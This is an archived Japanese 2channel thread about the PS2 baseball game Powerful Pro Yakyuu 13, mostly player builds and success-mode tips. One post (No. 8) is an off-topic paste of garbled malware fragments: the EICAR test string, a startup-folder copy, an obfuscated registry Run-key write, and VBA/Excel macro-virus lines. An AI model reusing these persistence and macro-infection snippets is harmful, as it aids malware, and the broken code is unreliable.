2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【PS2】実況パワフルプロ野球13 Part20

1 :名無しさん@お腹いっぱい。:2007/08/03(金) 06:22:40 ID:utclZWHt
実況パワフルプロ野球13 公式
http://www.konami.jp/gs/game/pawa/13/index.html
パワプロ通信
http://www.konami.jp/gs/game/pawa/index.html
パワプロ13@wiki
http://www15.atwiki.jp/pawapuro13/

2 :名無しさん@お腹いっぱい。:2007/08/03(金) 09:14:06 ID:Wc+CamUv
僕でいいんですか?
じゃあ失礼して……



3 :名無しさん@お腹いっぱい。:2007/08/03(金) 14:09:17 ID:L3IfuIQc
前スレ

【PS2】実況パワフルプロ野球13 Part19
http://game11.2ch.net/test/read.cgi/gamespo/1158836872/l50

4 :名無しさん@お腹いっぱい。:2007/08/08(水) 10:49:32 ID:Bungu8P5


5 :名無しさん@お腹いっぱい。:2007/08/08(水) 19:15:49 ID:P+2rVO11
13で作った奴をプロスピにやったら結構楽しくね?

6 :名無しさん@お腹いっぱい。:2007/08/11(土) 11:40:12 ID:GOxEf/r1
久しぶりにパワプロ買おうと思ってる。
14はwiiもってるわけでもない。
サクセスはやっぱり高校野球がいいなと俺は思う

そんな俺は14でなく13決定版あたり探して買ったほうがいいかね

7 :名無しさん@お腹いっぱい。:2007/08/11(土) 17:10:11 ID:MlBL9F4z
とりあえず変化球は投げた瞬間から曲がり始めることと
弾道2あれば誰でもすぐHRが出ることだけは覚えておいたほうがいい
安けりゃ買ってもいいんじゃないか、実際にやらないとこういうのは伝わらんだろうし

8 :名無しさん@お腹いっぱい。:2007/08/11(土) 17:14:34 ID:jlG2aNQE
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub
???????

9 :名無しさん@お腹いっぱい。:2007/08/11(土) 19:46:08 ID:CKmIcc+g
13のサクセスは高校野球じゃない
名前だけ高校野球のキャラゲー

買うなとは言わないが普通の野球好きならやらない方がいい

10 :名無しさん@お腹いっぱい。:2007/08/11(土) 23:55:53 ID:GOxEf/r1
さんくす
ん〜、なんか地雷臭が漂う評価ですな
どすっぺかなぁ

11 :名無しさん@お腹いっぱい。:2007/08/12(日) 03:11:09 ID:1OmNuA7K
携帯用の攻略サイトオヌヌメおしえてくだしあ

12 :名無しさん@お腹いっぱい。:2007/08/12(日) 04:16:43 ID:RM/EMtQf
>>7
そーなのかー。弟が借りてきたからよくわからんままにミートとパワーにつぎこんでるんだけど全然打てねぇwマイライフの極楽で練習中だけどなんかコツある?

13 :名無しさん@お腹いっぱい。:2007/08/12(日) 05:20:52 ID:TK52+9Ky
さっき威圧感持ちの抑えができた(あまり強くないが…)
コンA
スタE
球速146km/h
Hスライダ-7
シュ-ト3
ム-ビングファスト、キレ4、威圧感など

14 :名無しさん@お腹いっぱい。:2007/08/12(日) 06:30:01 ID:I9kufkWc
リアルバッティングほどではないけど、打てるようになるにはそれなりにやり込みが必要だと思う

15 :名無しさん@お腹いっぱい。:2007/08/12(日) 13:14:19 ID:RM/EMtQf
>>14
何で練習すればいいの?とりあえずコーチのところはオワタけど

16 :名無しさん@お腹いっぱい。:2007/08/12(日) 15:24:45 ID:qvyeN8JG
サクセスを100周もすれば打てるようになってるよ

17 :名無しさん@お腹いっぱい。:2007/08/12(日) 16:55:10 ID:rRSjCiCf
久しぶりに13で帝王でサクセスをやったんだが、
3年目の夏の大会アンドロメダ戦で
一回表に1点
三回表に4点
六回表に1点
七回表に12点
とられた
8回から操作可能になったが結局コールド負けした
おまけになぜか13失点のピッチャーをなぜか交代させていなかった




18 :名無しさん@お腹いっぱい。:2007/08/12(日) 18:40:43 ID:3UavMED7
wikiにパワフル高校でも普通の試合が出来るってあったんだが、
どうやるの?

19 :名無しさん@お腹いっぱい。:2007/08/12(日) 18:55:27 ID:TK52+9Ky
>>17
投手が先発ばっかりじゃね
先発3人
中継ぎor抑えが1人
とかだと交代しない

20 :名無しさん@お腹いっぱい。:2007/08/13(月) 21:32:20 ID:v6Tlec2X
マイライフで優勝請負人編とか憧れ編ってパス残せないよな??

21 :名無しさん@お腹いっぱい。:2007/08/14(火) 20:34:54 ID:JIQSzBsA
サクセスで、みずきの姉って初登場?
シリーズとびとびでやってるんでよくわからないけど。

プレイしたやつではあれの緑髪のキャラがいた。(名前失念
その作ではみずき姉って死んでいたような

22 :名無しさん@お腹いっぱい。:2007/08/15(水) 02:53:26 ID:fDYbJVxZ
サクセス画面ででるだろ
何作目からとか

23 :名無しさん@お腹いっぱい。:2007/08/15(水) 19:36:54 ID:iBeQda2n
でるんか
失礼thx

24 :名無しさん@お腹いっぱい。:2007/08/16(木) 02:28:03 ID:QGK3ynWf

13決のスレッてないの?

25 :名無しさん@お腹いっぱい。:2007/08/16(木) 12:36:38 ID:C9z7Zevo
決でもミーティング理論は健在ですか?

26 :名無しさん@お腹いっぱい。:2007/08/16(木) 20:21:40 ID:Znng3E8Z
みずきに三日月ネックレス返す以上のグットエンドはあるんかなー


萌えた

27 :名無しさん@お腹いっぱい。:2007/08/17(金) 12:06:54 ID:AmUWg4T1
>>26
それで威圧感取れるよ〜

28 :名無しさん@お腹いっぱい。:2007/08/17(金) 13:37:56 ID:8GSxGhMl
聖は14で終わった
みずきは14で進化した

29 :名無しさん@お腹いっぱい。:2007/08/19(日) 06:25:01 ID:XC7sTUEs
みずきのために14を買いそうな自分が憎い

30 :名無しさん@お腹いっぱい。:2007/08/19(日) 09:31:21 ID:JmhUTTBk
俺は決定版まで松

31 :名無しさん@お腹いっぱい。:2007/08/19(日) 20:30:44 ID:tMXr/AtP
尻上がりと打球反応ってどっちが必要ばい??あんまりよくわからんから尻上がりをとっちゃったけど。。

32 :名無しさん@お腹いっぱい。:2007/08/20(月) 13:33:40 ID:giJRyn9w
先発完投型なら尻上り欲しいね
打球反応も取れれば取りたいけど

33 :名無しさん@お腹いっぱい。:2007/08/20(月) 15:10:38 ID:LcLRyoWC
意外性ってどうゆう効果があるんですか?

34 :名無しさん@お腹いっぱい。:2007/08/20(月) 18:00:13 ID:KeJA2DgN
>>32サンクス。ならどっちもとっちゃおう。

35 :名無しさん@お腹いっぱい。:2007/08/20(月) 19:45:49 ID:BvicS1N9
尻上がりつけたらスタミナが終盤少し復活して少し多く投げられた

36 :名無しさん@お腹いっぱい。:2007/08/20(月) 21:00:18 ID:KeJA2DgN
変化球なにつけてる?オレはナックルカーブ7 Hスライダー2 SFF2  
ナックルカーブ好きだから必ずつけてる。

37 :名無しさん@お腹いっぱい。:2007/08/20(月) 23:22:07 ID:BvicS1N9
スライダ―系は、つけるよ
Hスライダ―6
スロ―カ―ブ3
シンカ―4
俺にとっては使いやすい

38 :名無しさん@お腹いっぱい。:2007/08/22(水) 00:44:34 ID:61O7pjW6
これってプロアクションリプレイ使える?

39 :名無しさん@お腹いっぱい。:2007/08/22(水) 12:52:23 ID:vgd1VVun
なんだか知らないが天才型しか出なくなったのでフォークがほぼもれなくついてしまう
ナックル系はパワフル相手にあまり通用しないので、当てられても飛びにくいHスラとかHシンカーとかが好き
ナックル+ナックルカーブって、対人にはイイけど対COMには最悪だな。ピンポン玉だ

40 :名無しさん@お腹いっぱい。:2007/08/23(木) 21:06:30 ID:JYYmbZjk
天才型はねぇ、能力高いけどいらない変化球がついてるときがあるからなぁ。


41 :名無しさん@お腹いっぱい。:2007/08/24(金) 16:54:45 ID:ihP4avAA
マイライフをオリジナル投手で一年目終わり辺りまで来たんだけどさ
なに あれ CPU強くなりすぎじゃね?
ホームランばっか打ってくるんですけど・・・w

難易度何段階目だかわからないけど1段階の差が激しいとこないかい

42 :名無しさん@お腹いっぱい。:2007/08/26(日) 03:30:37 ID:KW0930SW
あるねぇ しゃれにならんよな

43 :名無しさん@お腹いっぱい。:2007/08/29(水) 06:01:47 ID:FDGNS4gl
揚げ

44 :名無しさん@お腹いっぱい。:2007/08/29(水) 21:12:02 ID:gAiPsOCW
開幕版のローボールヒッターって、マイナス能力なんだったっけ?

45 :名無しさん@お腹いっぱい。:2007/08/30(木) 02:03:55 ID:QgYyqS1J
test

46 :名無しさん@お腹いっぱい。:2007/08/30(木) 06:56:09 ID:PvW1ed18
マイライフをプレミアムに味わうために、攻走守そろったピッチャーつくりました。

左なげ右打ち
145キロ コンスタA 
Hスラ1 SFF1 ナックルカーブ7 
弾道4 ミートD パワーA 走C  

特能はショボい。
回復、安定。闘志。など
チャンス4、盗塁5。など。たいしたもんはない。

ただ三振をあまり取れなくてつまんない。変化球をミスりました。
パスワード知りたい人いたら教えてください。対人には強いと思います。

47 :名無しさん@お腹いっぱい。:2007/08/31(金) 00:01:47 ID:36K0BVl+
>>44
打球が飛ばなくなるってよく言われてるが、
オレは決定版しかもってないから
比較できなす

48 :名無し:2007/08/31(金) 02:05:35 ID:DNxIP3Q3
test

49 :名無しさん@お腹いっぱい。:2007/08/31(金) 15:00:54 ID:pv3RC1Uf
サードがトンネルしてそれをショートが捕ってバッターを1塁でアウトに出来ても
サードのエラーなんですか?

50 :名無しさん@お腹いっぱい。:2007/09/01(土) 02:46:33 ID:ew2jiXxU
キャッチャーミットは必要だな キャッチャーミットがないぶん球速を遅く設定されてるからつまんない。

51 :名無しさん@お腹いっぱい。:2007/09/01(土) 14:15:25 ID:QAqviUk+
マイライフの結婚条件教えてください。

52 :名無しさん@お腹いっぱい。:2007/09/01(土) 14:48:48 ID:xdSBa9LC
【名前】 藤井
【肌の色】 肌色
【投打】 右投右打
【打法投法】 ホームラン君
【ポジション】 二塁手
【野手能力】
 弾道:3 ミート:G(1) パワー:D(85) 走力:E(6) 肩力:F(5) 守備力:G(1) エラー回避:G(1)
【特殊能力】 三振男、エラー、積極打法、強振多用、送球2 、意外性、逆境○、積極守備
【バット】木 【グラブ】黒 【リストバンド】右/なし 左/なし
【球団】横浜 【背番号】4 【生年月日】2月21日 【プロ通算年】高卒1年目

作成依頼スレが過疎ってるので、ここで依頼することにしました。
よろしければお願いします。

53 :名無しさん@お腹いっぱい。:2007/09/02(日) 03:37:17 ID:5m0M90KL
そのくらい自分でつくれるでしょ

54 :佐古:2007/09/03(月) 13:01:57 ID:qLZsxNTd
ひとり野球つくった。

武蔵
左投げ両打ち
145キロ コンAスタB
スライダー5 スローカーブ3 スクリュー2
弾道4 ミートD パワーA 走C 盗塁5 

どうっすか?

55 :名無しさん@お腹いっぱい。:2007/09/05(水) 21:21:01 ID:4CEHfQ/d
なんとなく俺も入ってる草野球チームを作ってみたwww(強化版)
1二EGDEE
2右EFFEF←これ俺
3一DEEFE
4左FDGFF
5三EDFED
6捕EEFDE
7遊FFEED
8投FGEDF
9中GGDFF

先発
125km/h
スライダー1
Hシュート1
控え(投手)
118km/h
スライダー1
チェンジアップ1
控え(野手)
FGFFG

56 :名無しさん@お腹いっぱい。:2007/09/08(土) 17:05:03 ID:pEv2QPck
13の決定版はまだまだ高いよな・・・

57 :名無しさん@お腹いっぱい。:2007/09/08(土) 17:05:34 ID:pEv2QPck
補足
>>56は中古のこと

58 :名無しさん@お腹いっぱい。:2007/09/09(日) 06:10:27 ID:HcSSh24W
変化球◎の継承選手が作れねぇー!!
帝王実業でおたすけキャラ(あおい)でセンス○じゃなきゃ作れんだろコレw
ああ、また今日も2時間かけて総変化12の中途半端な継承選手を作ってしまった・・・鬱

59 :名無しさん@お腹いっぱい。:2007/09/10(月) 23:21:09 ID:BEYqxT+N
バッティングがムズイムズイと言ってきたが対人戦を経てどれだけピッチングが難しいか理解した

60 :名無しさん@お腹いっぱい。:2007/09/13(木) 13:43:51 ID:NUov7QV7
バッティは言うほどムズくないだろ
どちらかと言うとピッチのほうが神経使う

61 :名無しさん@お腹いっぱい。:2007/09/15(土) 02:01:36 ID:jkHQWRAa
俺なんか難易度普通を相手にして
最高八つしか三振取れてないんだぜ……。

しかも渡辺俊介で。
サクセスで作った厨キャラの方はゴロばっかで無理だし。

62 :名無しさん@お腹いっぱい。:2007/09/15(土) 13:49:24 ID:uMHlhzHH
球速継承三人用意してタッグに変化球練習にミーティングた駆け回って初の甲子園4連覇したけど
ミーティングオンリー+手術一回成功に適わなかったorz
まぁ手術できてれば越えてたっぽいけど…


ところでミーティング主体のときは合宿でもプロとの合同練習行かないでミーティングやったほうがいいの?

63 :名無しさん@お腹いっぱい。:2007/09/15(土) 14:17:27 ID:CP2Wrsm1
>>62
もちろん開幕版の話だな?
MTG理論は、1年目2ヶ月はともかくとして、3年間ずっとMTGをやってこその理論
プロ合宿に行くかどうかは、うまいこと高い特殊能力をゲットできれば割に合う。そうでない場合は大損
合宿のために体力とパワリンを確保しなければならないのが痛い。前および最中に回復イベントが起きてくれれば・・・
いっそ合宿はあきらめて特殊能力は彼女から貰うという手もあるが、リスクも高すぎる
初期状態ではチームメイトの得意練習も吟味すべし。精神○走塁○ばかりだったらリセット
継承は変化球○(作れるなら◎)がいいが、○は狙って出せないのが難点

64 :名無しさん@お腹いっぱい。:2007/09/15(土) 15:06:51 ID:uMHlhzHH
>>63
サンクス。もちろん開幕版です。
なるほど、ミーティングやってればいいのね。
でもミーティングだけだと変化球ポイントがあまり稼げなくない?
俺のキャラは手術一回成功で総変化9しかいかなかったから…
(もちろんこのキャラ作ったときは変化球継承×3)

65 :名無しさん@お腹いっぱい。:2007/09/16(日) 13:21:10 ID:bH8q+fp/
>>64
手術成功でそれはさすがにへぼいと思うぞ
ちゃんとセンス○を吟味し、同期に変化球○がいて、特殊変化球を欲張らなければ、総変11〜12は行くはず
特に最初の変化球でいきなりナックル系をつけると後が伸ばしにくいので注意

66 :名無しさん@お腹いっぱい。:2007/09/16(日) 14:29:58 ID:dKDgyw7T
>>65
凡才スタートでいきなりナックルカーブから取ってた…orz
にゃるほど、それだとそんくらいいけそうな気がしなくもないな

ちなみに都道府県はどこがオススメ?
ジャイロが取れるって書いてあったから東東京でやってるんだけど
3人作って一回もイベントすら出ん(´・ω・`)
質問ばかりスマソ

67 :名無しさん@お腹いっぱい。:2007/09/16(日) 15:45:49 ID:bH8q+fp/
>>66
投手オススメ(すべて、フィーバー以上の場合)
メインイベント
宮城:2%ムービングファスト
神奈川:10%リリース○or3%逃げ球
山梨:10%勝ち運
三重:5%奪三振
奈良:3%逃げ球or5%回復4
愛媛:5%ジャイロ
福岡:10%ジャイロ

サブイベント
新潟(中部地区):2%勝ち運
徳島(中国四国地区):3%ジャイロ

なお東京は東西ほぼ共通で、メインが5%キャッチャー○、サブが20%バント○

68 :名無しさん@お腹いっぱい。:2007/09/16(日) 16:54:41 ID:dKDgyw7T
>>67
ありゃ、ガセネタにひっかかったかorz
ていうかそんなに確立低いのか…

参考にしてやってみまつ
ありがd(・ω・)ノ

69 :名無しさん@お腹いっぱい。:2007/09/16(日) 22:22:20 ID:y+MYaXsi
ジャイロ狙いなら須神絵久と付き合って、クリスマスに2万投資するか
スカウトを追っかけて、江川卓の話を聞く方が効率的。

70 :名無しさん@お腹いっぱい。:2007/09/17(月) 00:36:08 ID:+bbyE2I0
>>69
クリスマス以外はヌルーでおk?
1万とか2万貢いでバイト一回分しか回復しないと損した気が('A`)

71 :名無しさん@お腹いっぱい。:2007/09/17(月) 02:06:45 ID:+bbyE2I0
あれ、ていうかクリスマスに2マソのメニューが無い
3マソの次は1.5マソだた

72 :名無しさん@お腹いっぱい。:2007/09/17(月) 03:07:48 ID:NWSIoBm6
スマン、俺のは決定版だった。
一番、高い金額でおk

73 :名無しさん@お腹いっぱい。:2007/09/17(月) 11:25:58 ID:WxCzFrVK
この流れ…
一瞬何のゲームのスレかと思った

74 :名無しさん@お腹いっぱい。:2007/09/17(月) 17:02:46 ID:6XqTiYm7
14は個人的に受け付けないから13決やってるんですが

野手は帝王で作るとして投手はやはり全日本がいいんですか?

よく耳にするコールド勝ちしろとかコールドがいいって聞きますが
コールドってなんですか?orz
野球しらなくてスミマセン

75 :名無しさん@お腹いっぱい。:2007/09/17(月) 17:24:05 ID:WxCzFrVK
それくらいは自分で調べないと

76 :名無しさん@お腹いっぱい。:2007/09/18(火) 11:40:32 ID:3WyuYyHr
10点差つけてみると

77 :名無しさん@お腹いっぱい。:2007/09/19(水) 03:17:19 ID:vu71G+3d
ミーティング理論で改造一回成功したら165qABの化け物投手ができちまった
すげえな…

でも165qも150qも体感速度ほとんど変わらなくて普通に打てるのが悲しい

78 :名無しさん@お腹いっぱい。:2007/09/19(水) 19:25:28 ID:IjvGMJwC
>>76

親切にありがとうございます。

79 :名無しさん@お腹いっぱい。:2007/09/20(木) 03:00:04 ID:SoPjMKyd
アホな質問なんですがオーペナってどうやるんですか?
どうやってもマイライフみたいないちいち自分で指示出すのしかできなくて…
持ってるのは開幕版です。

80 :名無しさん@お腹いっぱい。:2007/09/20(木) 07:36:34 ID:Q4qbB8Ra
どういうものをオーペナと呼んでるんだ?

81 :名無しさん@お腹いっぱい。:2007/09/21(金) 00:05:18 ID:c1JT9t3m
オリ変イベントが初めてでよくわからんのでスライダーに遅くするを
2回やったら全然曲がらない糞球になった


どういう組み合わせでやったら強くなるのかおせーて

82 :名無しさん@お腹いっぱい。:2007/09/21(金) 00:06:46 ID:c1JT9t3m

遅くするじゃなくてブレーキのきいた球に、だった
スマソ

83 :名無しさん@お腹いっぱい。:2007/09/25(火) 20:43:26 ID:AmcgMRJ4
ttp://www2.atwiki.jp/pawapuro12/

ここの応援歌のパスワードって13じゃはいらないの?

全然入らないんだけど・・・

84 :名無しさん@お腹いっぱい。:2007/09/26(水) 15:18:16 ID:CUIW+4mx
質問なんですけど球速がやたら遅いピッチャーってどうすれば作れますか?
80kmとか100kmとか・・・

85 :名無しさん@お腹いっぱい。:2007/09/26(水) 16:01:21 ID:aiuO2Ed8
>>84
セーブして強制リセットの繰り返し。
コントロールとかも落ちるからお勧めは出来ないけど。

86 :名無しさん@お腹いっぱい。:2007/09/26(水) 18:13:56 ID:HhC5o5v5
80にするとストレートも他の球も全て80キロになるから下げすぎても意味無いぽ

87 :名無しさん@お腹いっぱい。:2007/09/26(水) 21:55:06 ID:CUIW+4mx
ありがとうございます!!
下がりすぎないようにやってみます!!

88 :名無しさん@お腹いっぱい。:2007/09/27(木) 09:24:13 ID:g0/nt6mj
三振がとれん…頑張っても3個しかとれん…どうなってるんだ?

89 :名無しさん@お腹いっぱい。:2007/09/27(木) 14:51:29 ID:finF0soV
スローボールが有効だよ。

90 :名無しさん@お腹いっぱい。:2007/10/09(火) 08:52:22 ID:mTj/7pw+
隅っこへのスローボールには大変お世話になってます。
でも打たれるときは打たれる。

91 :名無しさん@お腹いっぱい。:2007/10/09(火) 20:51:07 ID:XlzqsaGX
13開連れから借りてきたぜ!
11以来のパワプロなんだけど、
強振が強いとか十字が使いにくくなった以外に変更点ってありますか?

あとサクセスに関してはwiki見てればおk?

92 :名無しさん@お腹いっぱい。:2007/10/09(火) 23:04:58 ID:XlzqsaGX
ここ過疎りすぎだろw

ちなみに初めて選手ができたので載せてみる。

弾道3 BBACBD チャンス4 走塁4 ムードメーカ
人気者 積極走塁、盗塁

今回意外と簡単?

20 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)